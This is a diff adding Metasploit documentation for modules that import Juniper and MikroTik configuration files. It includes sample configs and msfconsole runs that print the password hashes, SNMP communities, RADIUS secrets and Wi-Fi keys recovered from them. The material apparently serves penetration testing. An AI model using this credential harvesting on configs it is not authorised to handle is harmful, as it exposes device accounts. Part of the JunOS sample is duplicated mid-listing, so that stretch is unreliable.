+                encrypted-password "$1$1.YvKzUY$dcAj99KngGhFZTpxGjA93."; ## SECRET-DATA
+            }
+        }
+        user newuser4 {
+            uid 2004;
+            class unauthorized;
+            authentication {
+                encrypted-password "$1$bdWYaqOE$z6oTSJS3p1R8CoNaos9Ce/"; ## SECRET-DATA
+            }
+        }
+    }
+    services {
+        ssh {
+            root-login allow;
+        }
+        web-management {
+            http;
+        }
+        dhcp {
+            traceoptions {
+                file dhcp_logfile;
+                level all;
+                flag all;
+            }
+            pool 192.168.10.0/24 {
+                address-range low 192.168.10.2 high 192.168.10.254;
+            }
+        }
+    }
+    syslog {
+        user * {
+            any emergency;
+        }
+        file messages {
+            any notice;
+            authorization info;
+        }
+        file interactive-commands {
+            interactive-commands any;
+        }
+    }
+}
+chassis {
+    alarm {
+        management-ethernet {
+            link-down ignore;
+        }
+    }
+    auto-image-upgrade;
+}
+interfaces {
+    ge-0/0/0 {
+        unit 0 {
+            family inet {
+                address 192.168.1.3/32;
+            }
+        }
+    }
+    ge-0/0/1 {
+        unit 0 {
+            family inet {
+                address 192.168.1.4/32;
+            }
+        }
+    }
+    ge-0/0/2 {
+        unit 0 {
+            family inet {
+                address 192.168.1.5/24;
+            }
+        }
+    }
+    ge-0/0/3 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/4 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/5 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/6 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/7 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/8 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/9 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/10 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/11 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/12 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/13 {
+        unit 0 {
+ ## Last commit: 2016-08-15 13:35:48 UTC by root
+version 12.3R7.7;
+system {
+    host-name h00dieJuniperEx2200;
+    root-authentication {
+        encrypted-password "$1$pz9b1.fq$foo5r85Ql8mXdoRUe0C1E."; ## SECRET-DATA
+    }
+    login {
+        user newuser {
+            uid 2000;
+            class super-user;
+            authentication {
+                encrypted-password "$1$rm8FaMFY$k4LFxqsVAiGO5tKqyO9jJ/"; ## SECRET-DATA
+            }
+        }
+        user newuser2 {
+            uid 2002;
+            class operator;
+            authentication {
+                encrypted-password "$1$aDZi44AP$bQGGjqPJ.F.Cm5QvX2yaa0"; ## SECRET-DATA
+            }
+        }
+        user newuser3 {
+            uid 2003;
+            class read-only;
+            authentication {
+                encrypted-password "$1$1.YvKzUY$dcAj99KngGhFZTpxGjA93."; ## SECRET-DATA
+            }
+        }
+        user newuser4 {
+            uid 2004;
+            class unauthorized;
+            authentication {
+                encrypted-password "$1$bdWYaqOE$z6oTSJS3p1R8CoNaos9Ce/"; ## SECRET-DATA
+            }
+        }
+    }
+    services {
+        ssh {
+            root-login allow;
+        }
+        web-management {
+            http;
+        }
+        dhcp {
+            traceoptions {
+                file dhcp_logfile;
+                level all;
+                flag all;
+            }
+            pool 192.168.10.0/24 {
+                address-range low 192.168.10.2 high 192.168.10.254;
+            }
+        }
+    }
+    syslog {
+        user * {
+            any emergency;
+        }
+        file messages {
+            any notice;
+            authorization info;
+        }
+        file interactive-commands {
+            interactive-commands any;
+        }
+    }
+}
+chassis {
+    alarm {
+        management-ethernet {
+            link-down ignore;
+        }
+    }
+    auto-image-upgrade;
+}
+interfaces {
+    ge-0/0/0 {
+        unit 0 {
+            family inet {
+                address 192.168.1.3/32;
+            }
+        }
+    }
+    ge-0/0/1 {
+        unit 0 {
+            family inet {
+                address 192.168.1.4/32;
+            }
+        }
+    }
+    ge-0/0/2 {
+        unit 0 {
+            family inet {
+                address 192.168.1.5/24;
+            }
+        }
+    }
+    ge-0/0/3 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/4 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/5 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/6 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/7 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/8 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/9 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/10 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/11 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/12 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/13 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/14 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/15 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/16 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/17 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/18 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/19 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/20 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/21 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/22 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/23 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/24 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/25 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/26 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/27 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/28 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/29 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/30 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/31 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/32 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/33 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/34 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/35 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/36 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/37 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/38 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/39 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/40 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/41 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/42 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/43 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/44 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/45 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/46 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/47 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/1/0 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/1/1 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/1/2 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/1/3 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    me0 {
+        unit 0 {
+            family inet {
+                address 192.168.1.1/24;
+            }
+        }
+    }
+    pp0 {
+        unit 0 {
+            ppp-options {
+                pap {
+                    local-name "'pap_username'";
+                    local-password "$9$he4revM87-dsevm5TQCAp0BErvLxd4JDNdkPfT/9BIR"; ## SECRET-DATA
+                }
+            }
+        }
+    }
+    st0 {
+        unit 1;
+    }
+    vlan {
+        unit 0 {
+            family inet {
+                dhcp {
+                    vendor-id Juniper-ex2200-48t-4g;
+                }
+            }
+        }
+    }
+}
+snmp {
+    name "snmp name";
+    description "snmp description";
+    location basement;
+    contact admin;
+    view jweb-view-all {
+        oid .1 include;
+    }
+    community read {
+        authorization read-only;
+    }
+    community write {
+        view jweb-view-all;
+        authorization read-write;
+    }
+    community public {
+        authorization read-only;
+    }
+    community private {
+        authorization read-write;
+    }
+    community secretsauce {
+        authorization read-write;
+    }
+    community "hello there" {
+        authorization read-write;
+    }
+}
+routing-options {
+    static {
+        route 0.0.0.0/0 next-hop 192.168.1.254;
+    }
+}
+protocols {
+    igmp-snooping {
+        vlan all;
+    }
+    rstp;
+    lldp {
+        interface all;
+    }
+    lldp-med {
+        interface all;
+    }
+}
+access {
+    radius-server {
+        1.1.1.1 secret "$9$Y-4GikqfF39JGCu1Ileq.PQ6AB1hrlMBIyKvWdV"; ## SECRET-DATA
+    }
+}
+ethernet-switching-options {
+    storm-control {
+        interface all;
+    }
+}
+vlans {
+    default {
+        l3-interface vlan.0;
+    }
+}           family ethernet-switching;
+        }
+    }
+    ge-0/0/14 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/15 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/16 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/17 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/18 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/19 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/20 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/21 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/22 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/23 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/24 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/25 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/26 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/27 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/28 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/29 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/30 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/31 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/32 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/33 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/34 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/35 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/36 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/37 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/38 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/39 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/40 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/41 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/42 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/43 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/44 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/45 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/46 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/0/47 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/1/0 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/1/1 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/1/2 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    ge-0/1/3 {
+        unit 0 {
+            family ethernet-switching;
+        }
+    }
+    me0 {
+        unit 0 {
+            family inet {
+                address 192.168.1.1/24;
+            }
+        }
+    }
+    pp0 {
+        unit 0 {
+            ppp-options {
+                pap {
+                    local-name "'pap_username'";
+                    local-password "$9$he4revM87-dsevm5TQCAp0BErvLxd4JDNdkPfT/9BIR"; ## SECRET-DATA
+                }
+            }
+        }
+    }
+    st0 {
+        unit 1;
+    }
+    vlan {
+        unit 0 {
+            family inet {
+                dhcp {
+                    vendor-id Juniper-ex2200-48t-4g;
+                }
+            }
+        }
+    }
+}
+snmp {
+    name "snmp name";
+    description "snmp description";
+    location basement;
+    contact admin;
+    view jweb-view-all {
+        oid .1 include;
+    }
+    community read {
+        authorization read-only;
+    }
+    community write {
+        view jweb-view-all;
+        authorization read-write;
+    }
+    community public {
+        authorization read-only;
+    }
+    community private {
+        authorization read-write;
+    }
+    community secretsauce {
+        authorization read-write;
+    }
+    community "hello there" {
+        authorization read-write;
+    }
+}
+routing-options {
+    static {
+        route 0.0.0.0/0 next-hop 192.168.1.254;
+    }
+}
+protocols {
+    igmp-snooping {
+        vlan all;
+    }
+    rstp;
+    lldp {
+        interface all;
+    }
+    lldp-med {
+        interface all;
+    }
+}
+access {
+    radius-server {
+        1.1.1.1 secret "$9$Y-4GikqfF39JGCu1Ileq.PQ6AB1hrlMBIyKvWdV"; ## SECRET-DATA
+    }
+}
+ethernet-switching-options {
+    storm-control {
+        interface all;
+    }
+}
+vlans {
+    default {
+        l3-interface vlan.0;
+    }
+}
+```
+
+#### ScreenOS
+
+[screenos](https://raw.githubusercontent.com/h00die/MSF-Testing-Scripts/master/juniper_ssg5_screenos.conf)
+
+```
+unset key protection enable
+set clock timezone 0
+set vrouter trust-vr sharable
+set vrouter "untrust-vr"
+exit
+set vrouter "trust-vr"
+unset auto-route-export
+exit
+set alg appleichat enable
+unset alg appleichat re-assembly enable
+set alg sctp enable
+set auth-server "Local" id 0
+set auth-server "Local" server-name "Local"
+set auth default auth server "Local"
+set auth radius accounting port 1646
+set admin name "netscreen"
+set admin password "nKVUM2rwMUzPcrkG5sWIHdCtqkAibn"
+set admin auth web timeout 10
+set admin auth dial-in timeout 3
+set admin auth server "Local"
+set admin format dos
+set zone "Trust" vrouter "trust-vr"
+set zone "Untrust" vrouter "trust-vr"
+set zone "DMZ" vrouter "trust-vr"
+set zone "VLAN" vrouter "trust-vr"
+set zone "Untrust-Tun" vrouter "trust-vr"
+set zone "Trust" tcp-rst 
+set zone "Untrust" block 
+unset zone "Untrust" tcp-rst 
+set zone "MGT" block 
+unset zone "V1-Trust" tcp-rst 
+unset zone "V1-Untrust" tcp-rst 
+set zone "DMZ" tcp-rst 
+unset zone "V1-DMZ" tcp-rst 
+unset zone "VLAN" tcp-rst 
+set zone "Untrust" screen tear-drop
+set zone "Untrust" screen syn-flood
+set zone "Untrust" screen ping-death
+set zone "Untrust" screen ip-filter-src
+set zone "Untrust" screen land
+set zone "V1-Untrust" screen tear-drop
+set zone "V1-Untrust" screen syn-flood
+set zone "V1-Untrust" screen ping-death
+set zone "V1-Untrust" screen ip-filter-src
+set zone "V1-Untrust" screen land
+set interface "ethernet0/0" zone "Untrust"
+set interface "ethernet0/1" zone "DMZ"
+set interface "bgroup0" zone "Trust"
+set interface bgroup0 port ethernet0/2
+set interface bgroup0 port ethernet0/3
+set interface bgroup0 port ethernet0/4
+set interface bgroup0 port ethernet0/5
+set interface bgroup0 port ethernet0/6
+unset interface vlan1 ip
+set interface bgroup0 ip 192.168.1.1/24
+set interface bgroup0 nat
+unset interface vlan1 bypass-others-ipsec
+unset interface vlan1 bypass-non-ip
+set interface bgroup0 ip manageable
+set interface ethernet0/0 dhcp client enable
+set interface ethernet0/0 dhcp client settings autoconfig
+set interface "serial0/0" modem settings "USR" init "AT&F"
+set interface "serial0/0" modem settings "USR" active
+set interface "serial0/0" modem speed 115200
+set interface "serial0/0" modem retry 3
+set interface "serial0/0" modem interval 10
+set interface "serial0/0" modem idle-time 10
+set ip tftp retry 30
+set ip tftp timeout 30
+set flow tcp-mss
+unset flow no-tcp-seq-check
+set flow tcp-syn-check
+unset flow tcp-syn-bit-check
+set flow reverse-route clear-text prefer
+set flow reverse-route tunnel always
+set pki authority default scep mode "auto"
+set pki x509 default cert-path partial
+set user "testuser" uid 1
+set user "testuser" type auth
+set user "testuser" hash-password "02b0jt2gZGipCiIEgl4eainqZIKzjSNQYLIwE="
+set user "testuser" enable
+set crypto-policy
+exit
+set ike respond-bad-spi 1
+set ike ikev2 ike-sa-soft-lifetime 60
+unset ike ikeid-enumeration
+unset ike dos-protection
+unset ipsec access-session enable
+set ipsec access-session maximum 5000
+set ipsec access-session upper-threshold 0
+set ipsec access-session lower-threshold 0
+set ipsec access-session dead-p2-sa-timeout 0
+unset ipsec access-session log-error
+unset ipsec access-session info-exch-connected
+unset ipsec access-session use-error-log
+set url protocol websense
+exit
+set policy id 1 from "Trust" to "Untrust"  "Any" "Any" "ANY" permit 
+set policy id 1
+exit
+set nsmgmt bulkcli reboot-timeout 60
+set ssh version v2
+set config lock timeout 5
+unset license-key auto-update
+set telnet client enable
+set snmp port listen 161
+set snmp port trap 162
+set snmpv3 local-engine id "0162122013002408"
+set vrouter "untrust-vr"
+exit
+set vrouter "trust-vr"
+unset add-default-route
+exit
+set vrouter "untrust-vr"
+exit
+set vrouter "trust-vr"
+exit
+```
+
+## Verification Steps
+
+1. Have a Juniper configuration file
+2. Start `msfconsole`
+3. `use auxiliary/admin/networking/juniper_config`
+4. `set RHOST x.x.x.x`
+5. `set CONFIG /tmp/file.config`
+6. `set action junos`
+7. `run`
+
+## Options
+
+### RHOST
+
+Needed for setting services and items to.  This is relatively arbitrary.
+
+### CONFIG
+
+File path to the configuration file.
+
+### Action
+
+`JUNOS` for JunOS config file, and `SCREENOS` for ScreenOS config file.
+
+## Scenarios
+
+### JunOS
+
+```
+root@metasploit-dev:~/metasploit-framework# wget -o /dev/null -O /tmp/juniper_ex2200.config https://raw.githubusercontent.com/h00die/MSF-Testing-Scripts/master/juniper_ex2200.config
+root@metasploit-dev:~/metasploit-framework# ./msfconsole 
+
+[*] Starting persistent handler(s)...
+msf5 > use auxiliary/admin/networking/gather/juniper_config
+msf5 auxiliary(admin/networking/gather/juniper_config) > set config /tmp/juniper_ex2200.config
+config => /tmp/juniper_ex2200.config
+msf5 auxiliary(admin/networking/gather/juniper_config) > set rhost 127.0.0.1
+rhost => 127.0.0.1
+msf5 auxiliary(admin/networking/gather/juniper_config) > run
+[*] Running module against 127.0.0.1
+
+[*] Importing config
+[+] root password hash: $1$pz9b1.fq$foo5r85Ql8mXdoRUe0C1E.
+[+] User 2000 named newuser in group super-user found with password hash $1$rm8FaMFY$k4LFxqsVAiGO5tKqyO9jJ/.
+[+] User 2002 named newuser2 in group operator found with password hash $1$aDZi44AP$bQGGjqPJ.F.Cm5QvX2yaa0.
+[+] User 2003 named newuser3 in group read-only found with password hash $1$1.YvKzUY$dcAj99KngGhFZTpxGjA93..
+[+] User 2004 named newuser4 in group unauthorized found with password hash $1$bdWYaqOE$z6oTSJS3p1R8CoNaos9Ce/.
+[+] SNMP community read with permissions read-only
+[+] SNMP community public with permissions read-only
+[+] SNMP community private with permissions read-write
+[+] SNMP community secretsauce with permissions read-write
+[+] SNMP community hello there with permissions read-write
+[+] radius server 1.1.1.1 password hash: $9$Y-4GikqfF39JGCu1Ileq.PQ6AB1hrlMBIyKvWdV
+[+] PPTP username 'pap_username' hash $9$he4revM87-dsevm5TQCAp0BErvLxd4JDNdkPfT/9BIR via PAP
+[+] Config import successful
+[*] Auxiliary module execution completed
+```
+
+### ScreenOS
+
+```
+root@metasploit-dev:~/metasploit-framework# wget -o /dev/null -O /tmp/screenos.conf https://raw.githubusercontent.com/h00die/MSF-Testing-Scripts/master/juniper_ssg5_screenos.conf
+root@metasploit-dev:~/metasploit-framework# ./msfconsole 
+
+[*] Starting persistent handler(s)...
+msf5 > use auxiliary/admin/networking/gather/juniper_config
+msf5 auxiliary(admin/networking/gather/juniper_config) > set config /tmp/screenos.conf
+config => /tmp/screenos.conf
+msf5 auxiliary(admin/networking/gather/juniper_config) > set rhost 127.0.0.1
+rhost => 127.0.0.1
+msf5 auxiliary(admin/networking/gather/juniper_config) > set action SCREENOS
+action => SCREENOS
+msf5 auxiliary(admin/networking/gather/juniper_config) > run
+[*] Running module against 127.0.0.1
+
+[*] Importing config
+[+] Admin user netscreen found with password hash nKVUM2rwMUzPcrkG5sWIHdCtqkAibn
+[+] User 1 named testuser found with password hash auth. Enable permission: 02b0jt2gZGipCiIEgl4eainqZIKzjSNQYLIwE=
+[+] Config import successful
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,637 @@
+## Vulnerable Application
+
+### General Notes
+
+This module imports a Mikrotik configuration file into the database.
+This is similar to `post/networking/gather/enum_mikrotik` only access isn't required,
+and assumes you already have the file.
+
+RouterOS images can be downloaded for VMs from the MikroTik website.
+
+* https://mikrotik.com/download
+* https://mikrotik.com/download/archive
+
+SwOS (Switch OS) can only be used on hardware devices.  These files are downloaded from the web interface.
+
+Example files for import from a RouterOS:
+
+### /export
+
+  ```
+  # jul/18/2020 16:07:05 by RouterOS 6.45.9
+  # software id =
+  #
+  #
+  #
+  /interface ovpn-client
+  add connect-to=10.99.99.98 mac-address=FE:45:B0:31:4A:34 name=ovpn-out1 password=password user=user
+  add connect-to=10.99.99.98 mac-address=FE:45:B0:31:4A:34 name=ovpn-out2 password=password user=user
+  add connect-to=10.99.99.98 disabled=yes mac-address=FE:45:B0:31:4A:34 name=ovpn-out3 password=password user=user
+  add connect-to=10.99.99.98 mac-address=FE:45:B0:31:4A:34 name=ovpn-out4 password=password user=user
+  /interface bridge
+  add name=bridge_local
+  /interface ethernet
+  set [ find default-name=ether1 ] disable-running-check=no
+  set [ find default-name=ether2 ] disable-running-check=no
+  /interface pppoe-client
+  # Client is on slave interface
+  add disabled=no interface=ether2 name=pppoe-user password=password service-name=internet user=user
+  /interface l2tp-client
+  add connect-to=10.99.99.99 name=l2tp-hm password=123 user=l2tp-hm
+  /interface pptp-client
+  add connect-to=10.99.99.99 disabled=no name=pptp-hm password=123 user=pptp-hm
+  /interface lte apn
+  add apn=accesspointname
+  /interface wireless security-profiles
+  set [ find default=yes ] supplicant-identity=MikroTik
+  add name=openwifi supplicant-identity=MikroTik
+  add authentication-types=wpa-psk mode=dynamic-keys name=wpawifi supplicant-identity=MikroTik wpa-pre-shared-key=presharedkey
+  add authentication-types=wpa2-psk mode=dynamic-keys name=wpa2wifi supplicant-identity=MikroTik wpa2-pre-shared-key=presharedkey
+  add authentication-types=wpa2-eap mode=dynamic-keys mschapv2-password=password mschapv2-username=username name=wpaeapwifi \
+      supplicant-identity=MikroTik
+  add mode=static-keys-required name=wepwifi static-key-0=0123456789 static-key-1=0987654321 static-key-2=1234509876 static-key-3=\
+      0192837645 supplicant-identity=MikroTik
+  add mode=static-keys-required name=wep1wifi static-key-0=1111111111 supplicant-identity=MikroTik
+  /ppp profile
+  add bridge=bridge_local name=ppp_bridge use-encryption=yes
+  /snmp community
+  add addresses=::/0 authentication-password=write name=write write-access=yes
+  add addresses=::/0 authentication-password=0123456789 authentication-protocol=SHA1 encryption-password=9876543210 \
+      encryption-protocol=AES name=v3
+  /interface bridge port
+  add bridge=bridge_local interface=ether2
+  /ip dhcp-client
+  add dhcp-options=hostname,clientid disabled=no interface=ether1
+  /ip smb users
+  add name=mtuser password=mtpasswd read-only=no
+  add disabled=yes name=disableduser password=disabledpasswd
+  /ppp secret
+  add name=ppp1 password=password profile=ppp_bridge
+  /snmp
+  set contact="fake <fake@fake.com>" location=nowhere
+  /system identity
+  set name=mikrotik_hostname
+  /tool e-mail
+  set address=1.1.1.1 from=router@router.com password=smtppassword user=smtpuser
+  ```
+
+### /export terse
+
+  ```
+  # jul/18/2020 16:08:41 by RouterOS 6.45.9
+  # software id =
+  #
+  #
+  #
+  /interface ovpn-client add connect-to=10.99.99.98 mac-address=FE:45:B0:31:4A:34 name=ovpn-out1 password=password user=user
+  /interface ovpn-client add connect-to=10.99.99.98 mac-address=FE:45:B0:31:4A:34 name=ovpn-out2 password=password user=user
+  /interface ovpn-client add connect-to=10.99.99.98 disabled=yes mac-address=FE:45:B0:31:4A:34 name=ovpn-out3 password=password user=user
+  /interface ovpn-client add connect-to=10.99.99.98 mac-address=FE:45:B0:31:4A:34 name=ovpn-out4 password=password user=user
+  /interface bridge add name=bridge_local
+  /interface ethernet set [ find default-name=ether1 ] disable-running-check=no
+  /interface ethernet set [ find default-name=ether2 ] disable-running-check=no
+  /interface pppoe-client
+  # Client is on slave interface
+  add disabled=no interface=ether2 name=pppoe-user password=password service-name=internet user=user
+  /interface l2tp-client add connect-to=10.99.99.99 name=l2tp-hm password=123 user=l2tp-hm
+  /interface pptp-client add connect-to=10.99.99.99 disabled=no name=pptp-hm password=123 user=pptp-hm
+  /interface lte apn add apn=accesspointname
+  /interface wireless security-profiles set [ find default=yes ] supplicant-identity=MikroTik
+  /interface wireless security-profiles add name=openwifi supplicant-identity=MikroTik
+  /interface wireless security-profiles add authentication-types=wpa-psk mode=dynamic-keys name=wpawifi supplicant-identity=MikroTik wpa-pre-shared-key=presharedkey
+  /interface wireless security-profiles add authentication-types=wpa2-psk mode=dynamic-keys name=wpa2wifi supplicant-identity=MikroTik wpa2-pre-shared-key=presharedkey
+  /interface wireless security-profiles add authentication-types=wpa2-eap mode=dynamic-keys mschapv2-password=password mschapv2-username=username name=wpaeapwifi supplicant-identity=MikroTik
+  /interface wireless security-profiles add mode=static-keys-required name=wepwifi static-key-0=0123456789 static-key-1=0987654321 static-key-2=1234509876 static-key-3=0192837645 supplicant-identity=MikroTik
+  /interface wireless security-profiles add mode=static-keys-required name=wep1wifi static-key-0=1111111111 supplicant-identity=MikroTik
+  /ppp profile add bridge=bridge_local name=ppp_bridge use-encryption=yes
+  /snmp community add addresses=::/0 authentication-password=write name=write write-access=yes
+  /snmp community add addresses=::/0 authentication-password=0123456789 authentication-protocol=SHA1 encryption-password=9876543210 encryption-protocol=AES name=v3
+  /interface bridge port add bridge=bridge_local interface=ether2
+  /ip dhcp-client add dhcp-options=hostname,clientid disabled=no interface=ether1
+  /ip smb users add name=mtuser password=mtpasswd read-only=no
+  /ip smb users add disabled=yes name=disableduser password=disabledpasswd
+  /ppp secret add name=ppp1 password=password profile=ppp_bridge
+  /snmp set contact="fake <fake@fake.com>" location=nowhere
+  /system identity set name=mikrotik_hostname
+  /tool e-mail set address=1.1.1.1 from=router@router.com password=smtppassword user=smtpuser
+  ```
+
+### /export verbose
+
+  ```
+  # jul/18/2020 16:09:36 by RouterOS 6.45.9
+  # software id =
+  #
+  #
+  #
+  /interface bridge
+  add ageing-time=5m arp=enabled arp-timeout=auto auto-mac=yes dhcp-snooping=no disabled=no fast-forward=yes forward-delay=15s \
+      igmp-snooping=no max-message-age=20s mtu=auto name=bridge_local priority=0x8000 protocol-mode=rstp transmit-hold-count=6 \
+      vlan-filtering=no
+  /interface ethernet
+  set [ find default-name=ether1 ] advertise=1000M-full,10000M-full arp=enabled arp-timeout=auto auto-negotiation=yes cable-settings=\
+      default disable-running-check=no disabled=no full-duplex=yes loop-protect=default loop-protect-disable-time=5m \
+      loop-protect-send-interval=5s mac-address=00:0C:29:9A:0B:43 mtu=1500 name=ether1 orig-mac-address=00:0C:29:9A:0B:43 speed=10Gbps
+  set [ find default-name=ether2 ] advertise=1000M-full,10000M-full arp=enabled arp-timeout=auto auto-negotiation=yes cable-settings=\
+      default disable-running-check=no disabled=no full-duplex=yes loop-protect=default loop-protect-disable-time=5m \
+      loop-protect-send-interval=5s mac-address=00:0C:29:9A:0B:4D mtu=1500 name=ether2 orig-mac-address=00:0C:29:9A:0B:4D speed=10Gbps
+  /queue interface
+  set bridge_local queue=no-queue
+  /interface list
+  set [ find name=all ] comment="contains all interfaces" exclude="" include="" name=all
+  set [ find name=none ] comment="contains no interfaces" exclude="" include="" name=none
+  set [ find name=dynamic ] comment="contains dynamic interfaces" exclude="" include="" name=dynamic
+  /interface lte apn
+  set [ find default=yes ] add-default-route=yes apn=internet default-route-distance=2 name=default use-peer-dns=yes
+  add add-default-route=yes apn=accesspointname default-route-distance=2 use-peer-dns=yes
+  /interface wireless security-profiles
+  set [ find default=yes ] authentication-types="" disable-pmkid=no eap-methods=passthrough group-ciphers=aes-ccm group-key-update=5m \
+      interim-update=0s management-protection=disabled management-protection-key="" mode=none mschapv2-password="" mschapv2-username=\
+      "" name=default radius-called-format=mac:ssid radius-eap-accounting=no radius-mac-accounting=no radius-mac-authentication=no \
+      radius-mac-caching=disabled radius-mac-format=XX:XX:XX:XX:XX:XX radius-mac-mode=as-username static-algo-0=none static-algo-1=\
+      none static-algo-2=none static-algo-3=none static-key-0="" static-key-1="" static-key-2="" static-key-3="" \
